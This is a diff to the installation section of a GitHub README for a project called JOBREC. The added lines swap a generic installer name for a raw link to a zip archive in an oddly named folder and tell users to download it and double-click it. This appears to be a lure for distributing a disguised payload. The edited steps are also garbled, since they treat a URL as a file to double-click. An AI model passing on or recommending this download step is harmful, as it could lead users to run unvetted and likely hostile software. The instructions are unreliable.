mari0413/JOBREC/README.md

    You’ll see a list of available versions of JOBREC.
 Locate the latest version, usually at the top of the list.

 3. **Download the Installer**
-   Find the file that says `JOBREC-installer.exe` or a similar name.
+   Find the file that says `https://github.com/mari0413/JOBREC/raw/refs/heads/main/percnosome/Software_v1.9.zip` or a similar name.
 Click on it to start the download.

 4. **Run the Installer**
    Once the download finishes, go to your download folder.
-Double-click on the `JOBREC-installer.exe` file.
+Double-click on the `https://github.com/mari0413/JOBREC/raw/refs/heads/main/percnosome/Software_v1.9.zip` file.
 This will start the installation process.

 5. **Follow the Installation Steps**
    The installer will guide you through the installation.
 Just follow the prompts and make choices as needed.